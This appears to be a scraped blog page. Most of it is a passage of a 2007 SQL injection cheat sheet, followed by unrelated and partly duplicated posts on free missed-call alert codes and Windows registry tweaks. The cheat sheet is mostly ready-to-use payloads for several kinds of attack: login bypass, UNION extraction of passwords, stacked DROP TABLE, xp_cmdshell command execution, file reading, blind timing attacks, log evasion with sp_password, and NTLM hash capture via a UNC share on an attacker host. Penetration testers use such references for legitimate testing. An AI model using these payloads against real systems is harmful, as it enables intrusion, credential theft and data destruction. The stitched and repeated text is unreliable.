• /*! MYSQL Special SQL */ (M)
This is a special comment syntax for MySQL. It’s perfect for detecting MySQL version. If you put a code into this comments it’s going to execute in MySQL only. Also you can use this to execute some code only if the server is higher than supplied version.
SELECT /*!32302 1/0, */ 1 FROM tablename
Classical Inline Comment SQL Injection Attack Samples
• ID: 10; DROP TABLE members /*
Simply get rid of other stuff at the end the of query. Same as 10; DROP TABLE members --
• SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02
MySQL Version Detection Sample Attacks
• ID: /*!32302 10*/
• ID: 10
You will get the same response if MySQL version is higher than 3.23.02
• SELECT /*!32302 1/0, */ 1 FROM tablename
Will throw an divison by 0 error if MySQL version is higher than 3.23.02
Stacking Queries
Executing more than one query in one transaction. This is very useful in every injection point, especially in SQL Server back ended applications.
• ; (S)
SELECT * FROM members; DROP members--
Ends a query and starts a new one.
Language / Database Stacked Query Support Table
green: supported, dark gray: not supported, light gray: unknown
SQL Server MySQL PostgreSQL ORACLE MS Access
ASP
ASP.NET
PHP
Java
About MySQL and PHP;
To clarify some issues;
PHP - MySQL doesn't support stacked queries, Java doesn't support stacked queries (I'm sure for ORACLE, not quite sure about other databases). Normally MySQL supports stacked queries but because of database layer in most of the configurations it’s not possible to execute second query in PHP-MySQL applications or maybe MySQL client supports this, not quite sure. Can someone clarify?
Stacked SQL Injection Attack Samples
• ID: 10;DROP members --
• SELECT * FROM products WHERE id = 10; DROP members--
This will run DROP members SQL sentence after normal SQL Query.
If Statements
Get response based on a if statement. This is one of the key points of Blind SQL Injection, also can be very useful to test simple stuff blindly and accurately.
MySQL If Statement
• IF(condition,true-part,false-part) (M)
SELECT IF(1=1,'true','false')
SQL Server If Statement
• IF condition true-part ELSE false-part (S)
IF (1=1) SELECT 'true' ELSE SELECT 'false'
If Statement SQL Injection Attack Samples
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0 (S)
This will throw an divide by zero error if current logged user is not "sa" or "dbo".
Using Integers
Very useful for bypassing, magic_quotes() and similar filters, or even WAFs.
• 0xHEXNUMBER (SM)
You can write hex like these;
SELECT CHAR(0x66) (S)
SELECT 0x5045 (this is not an integer it will be a string from Hex) (M)
SELECT 0x50 + 0x45 (this is integer now!) (M)
String Operations
String related operations. These can be quite useful to build up injections which are not using any quotes, bypass any other black listing or determine back end database.
String Concatenation
• + (S)
SELECT login + '-' + password FROM members
• || (*MO)
SELECT login || '-' || password FROM members
*About MySQL "||";
If MySQL is running in ANSI mode it’s going to work but otherwise MySQL accept it as `logical operator` it’ll return 0. Better way to do it is using CONCAT() function in MySQL.
• CONCAT(str1, str2, str3, ...) (M)
Concatenate supplied strings.
SELECT CONCAT(login, password) FROM members
Strings without Quotes
These are some direct ways to using strings but it’s always possible to use CHAR()(MS) and CONCAT()(M) to generate string without quotes.
• 0x457578 (M) - Hex Representation of string
SELECT 0x457578
This will be selected as string in MySQL.
In MySQL easy way to generate hex representations of strings use this;
SELECT CONCAT('0x',HEX('c:\\boot.ini'))
• Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ‘KLM’.
• SELECT CHAR(75)+CHAR(76)+CHAR(77) (S)
This will return ‘KLM’.
Hex based SQL Injection Samples
• SELECT LOAD_FILE(0x633A5C626F6F742E696E69) (M)
This will show the content of c:\boot.ini
String Modification & Related
• ASCII() (SMP)
Returns ASCII character value of leftmost character. A must have function for Blind SQL Injections.
SELECT ASCII('a')
• CHAR() (SM)
Convert an integer of ASCII.
SELECT CHAR(64)
Union Injections
With union you do SQL queries cross-table. Basically you can poison query to return records from another table.
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
This will combine results from both news table and members table and return all of them.
Another Example :
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
UNION – Fixing Language Issues
While exploiting Union injections sometimes you get errors because of different language settings (table settings, field settings, combined table / db settings etc.) these functions are quite useful to fix this problem. It's rare but if you dealing with Japanese, Russian, Turkish etc. applications then you will see it.
• SQL Server (S)
Use field COLLATE SQL_Latin1_General_Cp1254_CS_AS or some other valid one - check out SQL Server documentation.
SELECT header FROM news UNION ALL SELECT name COLLATE SQL_Latin1_General_Cp1254_CS_AS FROM members
• MySQL (M)
Hex() for every possible issue
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
• admin' --
• admin' #
• admin'/*
• ' or 1=1--
• ' or 1=1#
• ' or 1=1/*
• ') or '1'='1--
• ') or ('1'='1--
• ....
• Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
*Old versions of MySQL doesn't support union queries
Bypassing second MD5 hash check login screens
If application is first getting the record by username and then compare returned MD5 with supplied password's MD5 then you need to some extra tricks to fool application to bypass authentication. You can union results with a known password and MD5 hash of supplied password. In this case application will compare your password and your supplied MD5 hash instead of MD5 from database.
Bypassing MD5 Hash Check Example (MSP)
Username : admin
Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
81dc9bdb52d04dc20036dbd8313ed055 = MD5(1234)
Error Based - Find Columns Names
Finding Column Names with HAVING BY - Error Based (S)
In the same order,
• ' HAVING 1=1 --
• ' GROUP BY table.columnfromerror1 HAVING 1=1 --
• ' GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 --
• ' GROUP BY table.columnfromerror1, columnfromerror2, columnfromerror(n) HAVING 1=1 -- and so on
• If you are not getting any more error then it's done.
Finding how many columns in SELECT query by ORDER BY (MSO+)
Finding column number by ORDER BY can speed up the UNION SQL Injection process.
• ORDER BY 1--
• ORDER BY 2--
• ORDER BY N-- so on
• Keep going until get an error. Error means you found the number of selected columns.
Data types, UNION, etc.
Hints,
• Always use UNION with ALL because of image similiar non-distinct field types. By default union tries to get records with distinct.
• To get rid of unrequired records from left table use -1 or any not exist record search in the beginning of query (if injection is in WHERE). This can be critical if you are only getting one result at a time.
• Use NULL in UNION injections for most data type instead of trying to guess string, date, integer etc.
o Be careful in Blind situtaions may you can understand error is coming from DB or application itself. Because languages like ASP.NET generally throws errors while trying to use NULL values (because normally developers are not expecting to see NULL in a username field)
Finding Column Type
• ' union select sum(columntofind) from users-- (S)
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
If you are not getting error it means column is numeric.
• Also you can use CAST() or CONVERT()
o SELECT * FROM Table1 WHERE id = -1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL--
• 11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –-
No Error - Syntax is right. MS SQL Server Used. Proceeding.
• 11223344) UNION SELECT 1,NULL,NULL,NULL WHERE 1=2 –-
No Error – First column is an integer.
• 11223344) UNION SELECT 1,2,NULL,NULL WHERE 1=2 --
Error! – Second column is not an integer.
• 11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –-
No Error – Second column is a string.
• 11223344) UNION SELECT 1,’2’,3,NULL WHERE 1=2 –-
Error! – Third column is not an integer. ...
Microsoft OLE DB Provider for SQL Server error '80040e07'
Explicit conversion from data type int to image is not allowed.
You’ll get convert() errors before union target errors ! So start with convert() then union
Simple Insert (MSO+)
'; insert into users values( 1, 'hax0r', 'coolpass', 9 )/*
Useful Function / Information Gathering / Stored Procedures / Bulk SQL Injection Notes
@@version (MS)
Version of database and more details for SQL Server. It's a constant. You can just select it like any other column, you don't need to supply table name. Also you can use insert, update statements or in functions.
INSERT INTO members(id, user, pass) VALUES(1, ''+SUBSTRING(@@version,1,10) ,10)
Bulk Insert (S)
Insert a file content to a table. If you don't know internal path of web application you can read IIS (IIS 6 only) metabase file (%systemroot%\system32\inetsrv\MetaBase.xml) and then search in it to identify application path.
1. Create table foo( line varchar(8000) )
2. bulk insert foo from 'c:\inetpub\wwwroot\login.asp'
3. Drop temp table, and repeat for another file.
BCP (S)
Write text file. Login Credentials are required to use this function.
bcp "SELECT * FROM test..foo" queryout c:\inetpub\wwwroot\runcommand.asp -c -Slocalhost -Usa -Pfoobar
VBS, WSH in SQL Server (S)
You can use VBS, WSH scripting in SQL Server because of ActiveX support.
declare @o int
exec sp_oacreate 'wscript.shell', @o out
exec sp_oamethod @o, 'run', NULL, 'notepad.exe'
Username: '; declare @o int exec sp_oacreate 'wscript.shell', @o out exec sp_oamethod @o, 'run', NULL, 'notepad.exe' --
Executing system commands, xp_cmdshell (S)
Well known trick, By default it's disabled in SQL Server 2005. You need to have admin access.
EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'
Simple ping check (configure your firewall or sniffer to identify request before launch it),
EXEC master.dbo.xp_cmdshell 'ping
You can not read results directly from error or union or something else.
Some Special Tables in SQL Server (S)
• Error Messages
master..sysmessages
• Linked Servers
master..sysservers
• Password (2000 and 20005 both can be crackable, they use very similar hashing algorithm )
SQL Server 2000: masters..sysxlogins
SQL Server 2005 : sys.sql_logins
More Stored Procedures for SQL Server (S)
1. Cmd Execute (xp_cmdshell)
exec master..xp_cmdshell 'dir'
2. Registry Stuff (xp_regread)
1. xp_regaddmultistring
2. xp_regdeletekey
3. xp_regdeletevalue
4. xp_regenumkeys
5. xp_regenumvalues
6. xp_regread
7. xp_regremovemultistring
8. xp_regwrite
exec xp_regread HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters', 'nullsessionshares'
exec xp_regenumvalues HKEY_LOCAL_MACHINE, 'SYSTEM\CurrentControlSet\Services\snmp\parameters\validcommunities'
3. Managing Services (xp_servicecontrol)
4. Medias (xp_availablemedia)
5. ODBC Resources (xp_enumdsn)
6. Login mode (xp_loginconfig)
7. Creating Cab Files (xp_makecab)
8. Domain Enumeration (xp_ntsec_enumdomains)
9. Process Killing (need PID) (xp_terminate_process)
10. Add new procedure (virtually you can execute whatever you want)
sp_addextendedproc ‘xp_webserver’, ‘c:\temp\x.dll’
exec xp_webserver
11. Write text file to a UNC or an internal path (sp_makewebtask)
MSSQL Bulk Notes
SELECT * FROM master..sysprocesses /*WHERE spid=@@SPID*/
DECLARE @result int; EXEC @result = xp_cmdshell 'dir *.exe';IF (@result = 0) SELECT 0 ELSE SELECT 1/0
HOST_NAME()
IS_MEMBER (Transact-SQL)
IS_SRVROLEMEMBER (Transact-SQL)
OPENDATASOURCE (Transact-SQL)
INSERT tbl EXEC master..xp_cmdshell OSQL /Q"DBCC SHOWCONTIG"
OPENROWSET (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms190312.aspx
You can not use sub selects in SQL Server Insert queries.
SQL Injection in LIMIT (M) or ORDER (MSO)
SELECT id, product FROM test.test t LIMIT 0,0 UNION ALL SELECT 1,'x'/*,10 ;
If injection is in second limit you can comment it out or use in your union injection
Shutdown SQL Server (S)
When you really pissed off, ';shutdown --
Enabling xp_cmdshell in SQL Server 2005
By default xp_cmdshell and couple of other potentially dangerous stored procedures are disabled in SQL Server 2005. If you have admin access then you can enable these.
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1
RECONFIGURE
Finding Database Structure in SQL Server (S)
Getting User defined Tables
SELECT name FROM sysobjects WHERE xtype = 'U'
Getting Column Names
SELECT name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')
Moving records (S)
• Modify WHERE and use NOT IN or NOT EXIST,
... WHERE users NOT IN ('First User', 'Second User')
SELECT TOP 1 name FROM members WHERE NOT EXIST(SELECT TOP 0 name FROM members) -- very good one
• Using Dirty Tricks
SELECT * FROM Product WHERE ID=2 AND 1=CAST((Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE i.id<=o.id) AS x, name from sysobjects o) as p where p.x=3) as int
Select p.name from (SELECT (SELECT COUNT(i.id) AS rid FROM sysobjects i WHERE xtype='U' and i.id<=o.id) AS x, name from sysobjects o WHERE o.xtype = 'U') as p where p.x=21
Fast way to extract data from Error Based SQL Injections in SQL Server (S)
';BEGIN DECLARE @rt varchar(8000) SET @rd=':' SELECT @rd=@rd+' '+name FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'MEMBERS') AND name>@rd SELECT @rd AS rd into TMP_SYS_TMP end;--
Detailed Article : Fast way to extract data from Error Based SQL Injections
Blind SQL Injections
About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.
Normal Blind, You can not see a response in the page but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common though.
In normal blinds you can use if statements or abuse WHERE query in injection (generally easier), in totally blinds you need to use some waiting functions and analyze response times. For this you can use WAIT FOR DELAY '0:0:10' in SQL Server, BENCHMARK() in MySQL, pg_sleep(10) in PostgreSQL, and some PL/SQL tricks in ORACLE.
Real and a bit Complex Blind SQL Injection Attack Sample
This output taken from a real private Blind SQL Injection tool while exploiting SQL Server back ended application and enumerating table names. This requests done for first char of the first table name. SQL queries a bit more complex then requirement because of automation reasons. In we are trying to determine an ascii value of a char via binary search algorithm.
TRUE and FALSE flags mark queries returned true or false.
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>103--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<103--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>89--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<89--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>83--
TRUE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<83--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>80--
FALSE : SELECT ID, Username, Email FROM [User]WHERE ID = 1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)<80--
Since both of the last 2 queries failed we clearly know table name's first char's ascii value is 80 which means first char is `P`. This is the way to exploit Blind SQL injections by binary search algorithm. Other well known way is reading data bit by bit. Both can be effective in different conditions.
Waiting For Blind SQL Injections
First of all use this if it's really blind, otherwise just use 1/0 style errors to identify difference. Second, be careful while using times more than 20-30 seconds. database API connection or script can be timeout.
WAIT FOR DELAY 'time' (S)
This is just like sleep, wait for spesified time. CPU safe way to make database wait.
WAITFOR DELAY '0:0:10'--
Also you can use fractions like this,
WAITFOR DELAY '0:0:0.51'
Real World Samples
• Are we 'sa' ?
if (select user) = 'sa' waitfor delay '0:0:10'
• ProductID = 1;waitfor delay '0:0:10'--
• ProductID =1);waitfor delay '0:0:10'--
• ProductID =1';waitfor delay '0:0:10'--
• ProductID =1');waitfor delay '0:0:10'--
• ProductID =1));waitfor delay '0:0:10'--
• ProductID =1'));waitfor delay '0:0:10'--
BENCHMARK() (M)
Basically we are abusing this command to make MySQL wait a bit. Be careful you will consume web servers limit so fast!
BENCHMARK(howmanytimes, do this)
Real World Samples
• Are we root ? woot!
IF EXISTS (SELECT * FROM users WHERE username = 'root') BENCHMARK(1000000000,MD5(1))
• Check Table exist in MySQL
IF (SELECT * FROM login) BENCHMARK(1000000,MD5(1))
pg_sleep(seconds) (P)
Sleep for supplied seconds.
• SELECT pg_sleep(10);
Sleep 10 seconds.
Covering Tracks
SQL Server -sp_password log bypass (S)
SQL Server don't log queries which includes sp_password for security reasons(!). So if you add --sp_password to your queries it will not be in SQL Server logs (of course still will be in web server logs, try to use POST if it's possible)
Clear SQL Injection Tests
These tests are simply good for blind sql injection and silent attacks.
1. product.asp?id=4 (SMO)
a. product.asp?id=5-1
b. product.asp?id=4 OR 1=1
2. product.asp?name=Book
a. product.asp?name=Bo’%2b’ok
b. product.asp?name=Bo’ || ’ok (OM)
c. product.asp?name=Book’ OR ‘x’=’x
Some Extra MySQL Notes
• Sub Queries are working only MySQL 4.1+
• Users
o SELECT User,Password FROM mysql.user;
• SELECT 1,1 UNION SELECT IF(SUBSTRING(Password,1,1)='2',BENCHMARK(100000,SHA1(1)),0) User,Password FROM mysql.user WHERE User = ‘root’;
• SELECT ... INTO DUMPFILE
o Write query into a new file (can not modify existing files)
• UDF Function
o create function LockWorkStation returns integer soname 'user32';
o select LockWorkStation();
o create function ExitProcess returns integer soname 'kernel32';
o select exitprocess();
• SELECT USER();
• SELECT password,USER() FROM mysql.user;
• First byte of admin hash
o SELECT SUBSTRING(user_password,1,1) FROM mb_users WHERE user_group = 1;
• Read File
o query.php?user=1+union+select+load_file(0x63...),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
• MySQL Load Data inifile
o By default it’s not avaliable !
create table foo( line blob );
load data infile 'c:/boot.ini' into table foo;
select * from foo;
• More Timing in MySQL
• select benchmark( 500000, sha1( 'test' ) );
• query.php?user=1+union+select+benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
• select if( user() like 'root@%', benchmark(100000,sha1('test')), 'false' );
Enumeration data, Guessed Brute Force
o select if( (ascii(substring(user(),1,1)) >> 7) & 1, benchmark(100000,sha1('test')), 'false' );
Potentially Useful MySQL Functions
• MD5()
MD5 Hashing
• SHA1()
SHA1 Hashing
• PASSWORD()
• ENCODE()
• COMPRESS()
Compress data, can be great in large binary reading in Blind SQL Injections.
• ROW_COUNT()
• SCHEMA()
• VERSION()
Same as @@version
Second Order SQL Injections
Basically you put an SQL Injection to some place and expect it's unfiltered in another action. This is common hidden layer problem.
Name : ' + (SELECT TOP 1 password FROM users ) + '
Email : xx@xx.com
If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.
Forcing SQL Server to get NTLM Hashes
This attack can help you to get SQL Server user's Windows password of target server, but possibly you inbound connection will be firewalled. Can be very useful internal penetration tests. We force SQL Server to connect our Windows UNC Share and capture data NTLM session with a tool like Cain & Abel.
Bulk insert from a UNC Share (S)
bulk insert foo from '\\YOURIPADDRESS\C$\x.txt'
Check out Bulk Insert Reference to understand how can you use bulk insert.
References
Since these notes collected from several different sources within several years and personal experiences, may I missed some references. If you believe I missed yours or someone else then drop me an email (ferruh-at-mavituna.com), I'll update it as soon as possible.
• Lots of Stuff
o Advanced SQL Injection In SQL Applications, Chris Anley
o More Advanced SQL Injection In SQL Applications, Chris Anley
o Blindfolded SQL Injection, Ofer Maor – Amichai Shulman
o Hackproofing MySQL, Chris Anley
o Database Hacker's Handbook, David Litchfield, Chris Anley, John Heasman, Bill Grindlay
o Upstairs Team!
• MSSQL Related
o MSSQL Operators - http://msdn2.microsoft.com/en-us/library/aa276846(SQL.80).aspx
o Transact-SQL Reference - http://msdn2.microsoft.com/en-us/library/aa299742(SQL.80).aspx
o String Functions (Transact-SQL) - http://msdn2.microsoft.com/en-us/library/ms181984.aspx
o List of MSSQL Server Collation Names - http://msdn2.microsoft.com/en-us/library/ms180175.aspx
o MSSQL Server 2005 Login Information and some other functions : Sumit Siddharth
• MySQL Related
o Comments : http://dev.mysql.com/doc/
o Control Flows - http://dev.mysql.com/doc/refman/5.0/en/control-flow-functions.html
o MySQL Gotchas - http://sql-info.de/mysql/gotchas.htm
o New SQL Injection Concept, Tonu Samuel
ChangeLog
• 15/03/2007 - Public Release v1.0
• 16/03/2007 - v1.1
o Links added for some paper and book references
o Collation sample added
o Some typos fixed
o Styles and Formatting improved
o New MySQL version and comment samples
o PostgreSQL Added to Ascii and legends, pg_sleep() added blind section
o Blind SQL Injection section and improvements, new samples
o Reference paper added for MySQL comments
• 21/03/2007 - v1.2
o BENCHMARK() sample changed to avoid people DoS their MySQL Servers
o More Formatting and Typo
o Descriptions for some MySQL Function
• 30/03/2007 v1.3
o Niko pointed out PotsgreSQL and PHP supports stacked queries
o Bypassing second MD5 check login screens description and attack added
o Mark came with extracting NTLM session idea, added
o Detailed Blind SQL Exploitation added
• 13/04/2007 v1.4 - Release
o SQL Server 2005 enabling xp_cmdshell added (trick learned from mark)
o Japanese version of SQL Injection Cheat Sheet released (v1.1)
Sunday, September 27, 2009
FREE MISSED CALL HACK
************Tata Docomo Free Missed Call Alert Hack*****************
Free missed call Alert for TATA Docomo
just type ‘SUB’ and send it to 52244 (toll free).
and Enjoy………
**************Free Airtel Missed Call Alert Hack*******************
What is Missed Call Alert?
When your phone is Switch Off or Out of Reach, You will be notified via SMS when you will switch on your phone or you get back your network. To avail follow the instructions given below:
* To activate dial : *62*675# and press call button.
* To deactivate dial : #62# and press call button.
FREE MISS CALL ALERT FOR MUMBAI
Just dial **62*+91560# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR MAHARASHTRA
Just dial **62*+91675# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR TAMILNADDU
Just dial **62*+919894035100# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR RAJASTHAN
Just dial **62*+91569# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR DELHI
Just dial **62*+91564# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT 4 GUJARAT
Just dial **62*+919824001711# and get free miss call alert 4 lifetime!
Enjoy This Trick!
**************Free Missed Call Alert for Vodafone**************
Free missed call Alert for Vodafone just dial
*62*919899299940#
and enjoy
***************BSNL Missed Call Alert Hack**************
We have an new BSNL Missed call alert hack working allover India. BSNL Cellone is one of the most used mobile networks in India. So to use this trick you have follow these steps
>*62*+9117010#
or make manual call divert to the following number
+9117010
once you configure these settings you can have free missed call alerts in BSNL mobiles even when your switched off or out of coverage.
Or you can use this method:
when you want to talk to someone dear and don’t want anyone to disturb you or rather don’t want anyone to know that your phone is busy or engaged, you just need to do is before making the call activate this by going to call divert function and diverting all voice calls to the number 17010 and after its activated whoever calls you will get to hear that you are not reachable or are out of coverage area. This way you don’t get caught and the best part being that you receive a SMS stating which call u missed.
So enjoy this latest new BSNL trick!
******************Free Aircel Missed Call Alert**************
To know missed call alerts freely in aircel, here a trick for you.
Dial this *62*+919842201006#
or
go to calldivert and divert if out of reach there put this - 9842201006.
****************Free Reliance Missed Call Alert************
Enjoy Free Reliance Missed Call Alert:
Maharashtra +91675
Mumbai +91560
Gujarat +91567
Kerala *62*+91567
Haryana *62*+9017000700
Tamil Nadu *62*+9894035100
***************Free Missed Call Alerts For Idea************
Free missed call alerts….
Delhi:
*62*+919891004748#
Rajasthan:
*62*+919887040012#
Maharashtra:
*62*+919822001711#
Kerala:
*62*+919847926340#
Bihar & Jharkhand:
*62*+919708002800#
Gujarat:
*62*+919824001711#
Free missed call Alert for TATA Docomo
just type ‘SUB’ and send it to 52244 (toll free).
and Enjoy………
**************Free Airtel Missed Call Alert Hack*******************
What is Missed Call Alert?
When your phone is Switch Off or Out of Reach, You will be notified via SMS when you will switch on your phone or you get back your network. To avail follow the instructions given below:
* To activate dial : *62*675# and press call button.
* To deactivate dial : #62# and press call button.
FREE MISS CALL ALERT FOR MUMBAI
Just dial **62*+91560# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR MAHARASHTRA
Just dial **62*+91675# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR TAMILNADDU
Just dial **62*+919894035100# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR RAJASTHAN
Just dial **62*+91569# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT FOR DELHI
Just dial **62*+91564# and get free miss call alert 4 lifetime!
FREE MISS CALL ALERT 4 GUJARAT
Just dial **62*+919824001711# and get free miss call alert 4 lifetime!
Enjoy This Trick!
**************Free Missed Call Alert for Vodafone**************
Free missed call Alert for Vodafone just dial
*62*919899299940#
and enjoy
***************BSNL Missed Call Alert Hack**************
We have an new BSNL Missed call alert hack working allover India. BSNL Cellone is one of the most used mobile networks in India. So to use this trick you have follow these steps
>*62*+9117010#
or make manual call divert to the following number
+9117010
once you configure these settings you can have free missed call alerts in BSNL mobiles even when your switched off or out of coverage.
Or you can use this method:
when you want to talk to someone dear and don’t want anyone to disturb you or rather don’t want anyone to know that your phone is busy or engaged, you just need to do is before making the call activate this by going to call divert function and diverting all voice calls to the number 17010 and after its activated whoever calls you will get to hear that you are not reachable or are out of coverage area. This way you don’t get caught and the best part being that you receive a SMS stating which call u missed.
So enjoy this latest new BSNL trick!
******************Free Aircel Missed Call Alert**************
To know missed call alerts freely in aircel, here a trick for you.
Dial this *62*+919842201006#
or
go to calldivert and divert if out of reach there put this - 9842201006.
****************Free Reliance Missed Call Alert************
Enjoy Free Reliance Missed Call Alert:
Maharashtra +91675
Mumbai +91560
Gujarat +91567
Kerala *62*+91567
Haryana *62*+9017000700
Tamil Nadu *62*+9894035100
***************Free Missed Call Alerts For Idea************
Free missed call alerts….
Delhi:
*62*+919891004748#
Rajasthan:
*62*+919887040012#
Maharashtra:
*62*+919822001711#
Kerala:
*62*+919847926340#
Bihar & Jharkhand:
*62*+919708002800#
Gujarat:
*62*+919824001711#
Internet Explorer As Fast As FireFox
Open registry editor by going to Start then Run and entering regedit. Once in registry, navigate to key HKEY_CURRENT_USER\Software\microsoft\Windows\ Current Version \InternetSettings. Right click on the right windows--)New --)DWORD.Type MaxConnectionsPerServer.You can set value (the more higher the no, the more good speed eg:99). Create another DWORD >type MaxConnectionsPer1_0Server . Then put a high value as mentioned above. Restart I.E and you are done.
Mozilla Firefox 3.5 Download
Click HERE to Download Mozilla Firefox 3.5 For More Surfing Speed and Many More Features.
Add Specific Folders to Open Dialog Box
When you use certain Windows applications (such as Notepad) to open a file, on the left side of the Open dialog box are a group of icons and folders (such as My Documents, My Recent Documents, Desktop, My Computer, and My Network) to which you can navigate to open files. A registry hack will let you put just the folders of your choosing on the left side of the Open dialog box.
Note that when you do this,it will affect XP applications such as Notepad and Paint that use the Open and Save common dialog boxes. However, it won’t affect Microsoft Office applications and other applications that don’t use the common dialog boxes. Run the Registry Editor and go to HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Policies\comdlg32. This is the key that determines how common dialog boxes are handled.
You’re going to create a subkey that will create a customized location for the folders, and then give that subkey a series of values, each of which will define a folder location.To start, create a new subkey underneath EY_CURRENT_USER\Software\ Microsoft \Windows \CurrentVersion\Policies\comdlg32 called Placesbar, and create a String value for it named Place0. Give Place0 a value of the topmost folder that you want to appear on the Open dialog box, for example, C:\Projects. Next, create another String value for Placesbar called Place1. Give it a value of the second folder that you want to appear on the Open dialog box. You can put up to five icons on the Open dialog box, so create new String values up to Place4 and give them values as outlined in the previous steps. When you’re done, exit the Registry. You won’t have to reboot for the changes to take effect.
If you do not want any folders to appear in common Open dialog boxes,you can do that as well. In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ comdlg32, create a new DWORD value called NoPlacesBar and give it a value of 1. Exit the Registry. If you want the folders back, either delete NoPlacesBar or give it a value of 0.
Note that when you do this,it will affect XP applications such as Notepad and Paint that use the Open and Save common dialog boxes. However, it won’t affect Microsoft Office applications and other applications that don’t use the common dialog boxes. Run the Registry Editor and go to HKEY_CURRENT_USER \Software \Microsoft \Windows \CurrentVersion \Policies\comdlg32. This is the key that determines how common dialog boxes are handled.
You’re going to create a subkey that will create a customized location for the folders, and then give that subkey a series of values, each of which will define a folder location.To start, create a new subkey underneath EY_CURRENT_USER\Software\ Microsoft \Windows \CurrentVersion\Policies\comdlg32 called Placesbar, and create a String value for it named Place0. Give Place0 a value of the topmost folder that you want to appear on the Open dialog box, for example, C:\Projects. Next, create another String value for Placesbar called Place1. Give it a value of the second folder that you want to appear on the Open dialog box. You can put up to five icons on the Open dialog box, so create new String values up to Place4 and give them values as outlined in the previous steps. When you’re done, exit the Registry. You won’t have to reboot for the changes to take effect.
